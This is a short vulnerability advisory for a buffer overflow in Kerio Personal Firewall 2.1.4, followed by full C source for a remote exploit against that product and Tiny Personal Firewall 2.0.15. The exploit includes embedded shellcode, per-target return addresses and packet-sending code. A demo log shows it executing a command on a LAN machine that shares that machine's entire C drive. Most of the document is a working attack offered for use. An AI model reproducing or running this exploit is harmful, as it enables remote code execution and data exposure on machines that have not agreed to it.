// source: https://www.securityfocus.com/bid/7180/info
A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.
Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.
Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.
/**************************************************************
* Personal Firewall Engine remote buffer overflow Exploit
**************************************************************
*
* Original information shared by CORE Security Technologies.
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Released : 30/04/2003
*
* Coded By ThreaT.
* ThreaT@Ifrance.com
* http://s0h.cc/~threat
*
********************************************************************
*
* This exploit take advantage of the vulnerability discovered by
* CORE Security Technologies for execute a command on remote workstations
* equiped with the fallowing PSW :
*
* - Tiny Personal Firewall 2.0.15
* - Kerio Personal Firewall 2.1.4
*
*********************************************************************
*
* Usage : PFExploit.exe <target> <victim_ip> <command to execute>
*
* =====================================================================
* !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
* =====================================================================
*/
#include <windows.h>
#include <winsock.h>
#define len 0x1494
void main (int argc, char *argv[])
{
SOCKET sock1;
SOCKADDR_IN sin;
int i;
DWORD byte = htonl(len);
char buffer[len], *p,
shellcode[] =
"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
"\xD9\xFF\xFF\xFF";
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
struct _target {
char Name[4];
char *RetAddr;
char *App;
} targ[2] = {
{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
};
printf ("#############################################################\n"
"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
"#############################################################\n"
"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
"ThreaT@Ifrance.com\n"
"http://s0h.cc/~threat\n-\n\n");
if (argc < 4)
{
printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
"TARGET ARE\n"
"__________\n\n"
"TPF : for Tiny Personal Firewall 2.0.15\n"
"KPF : for Kerio Personal Firewall 2.1.4\n\n");
ExitProcess (0);
}
if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
{
printf ("error, cannot allocate memory\n");
ExitProcess (0);
}
memset (buffer,0x90,len);
strcpy (p,shellcode);
lstrcat (p,argv[3]);
memcpy (&buffer[200],p,strlen (p)+1);
for (i=0; i < 2 ; i++)
if (!lstrcmpi (argv[1],targ[i].Name)) break;
if (i > 1)
{
printf ("Erreur : la cible %s est inconnue\n",argv[1]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata))
{
printf ("Erreur d'initialisation Winsock\n");
ExitProcess (0);
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr=inet_addr (argv[2]);
sin.sin_port = htons (44334);
memcpy (&buffer[0x1490],targ[i].RetAddr,4);
printf ("Cible : %s\n\n"
"Connecting to %s...", targ[i].App, argv[2]);
sock1 = socket (AF_INET, SOCK_STREAM, 0);
bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("connexion failed !\n");
ExitProcess (0);
}
printf ("ok!\n\n"
"sending crash for remote execution of '%s'...",argv[3]);
Sleep (1000);
send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
send (sock1,buffer,len,0);
puts ("ok");
}
/* DEMO ON MY LAN *
D:\code\exploits\kerio>ipconfig
Configuration IP de Windows 2000
Ethernet carte Connexion au r�seau local 2�:
�tat du media . . . . . . . . . . : C�ble D�connect�
Ethernet carte Connexion au r�seau local�:
Suffixe DNS sp�c. � la connexion. : ThreaT.lan
Adresse IP. . . . . . . . . . . . : 10.0.0.1
Masque de sous-r�seau . . . . . . : 255.0.0.0
Passerelle par d�faut . . . . . . : 10.0.0.138
D:\code\exploits\kerio>net view \\10.0.0.3
La liste est vide.
D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
#############################################################
Personal Firewall Engine, Remote buffer overflow Exploit !
#############################################################
Discovered by CORE Security Technologies & Coded by ThreaT
-
ThreaT@Ifrance.com
http://s0h.cc/~threat
-
Cible : Tiny Personal Firewall 2.0.15
Connecting to 10.0.0.3...ok!
sending crash for remote execution of 'cmd /c net share c=c:"'...ok
D:\code\exploits\kerio>net view \\10.0.0.3
Ressources partag�es de \\10.0.0.3
Nom Type Local Remarque
-------------------------------------------------------------------------------
c Disque
La commande s'est termin�e correctement.
D:\code\exploits\kerio>
* EOF */